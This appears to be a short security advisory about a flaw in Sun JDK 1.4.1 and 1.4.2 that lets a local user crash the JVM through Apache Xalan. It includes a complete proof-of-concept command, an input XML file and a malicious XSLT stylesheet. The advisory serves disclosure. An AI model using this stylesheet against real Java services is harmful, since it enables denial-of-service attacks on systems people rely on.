|
|
| |
| A vulnerability in Sun's JVM allows local attackers to crash the Apache XALAN by causing it to parse malformed XML/XSLT data. |
| |
Credit:
The original advisory can be found at: http://www.illegalaccess.org/.
The information has been provided by Marc Schoenefeld.
|
| |
Vulnerable systems:
* JDK version 1.4.1
* JDK version 1.4.2
Exploit:
Command:
c:\java\1.4.2\00\jre\bin\java org.apache.xalan.xslt.Process -IN a.xml -xsl sunexploit.xsl
===================a.xml===========================
(a/)
===================a.xml===========================
===========sunexploit.xsl=============================
(!-- XSLT JDK-Exploit by Marc Schoenefeld , marc@at@illegalaccess.org --)
(xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:sun="sun")
(xsl:template match="/")
(xsl:variable name="tmp"
select="sun:misc.MessageUtils.toStdout(null)"/)
(xsl:variable name="tmp2"
select="sun:misc.MessageUtils.toStdout($tmp)"/)
(xsl:value-of select="$tmp2" /)
(/xsl:template)
(/xsl:stylesheet)
===========sunexploit.xsl=============================
|
|
|
|
|
|
|
|
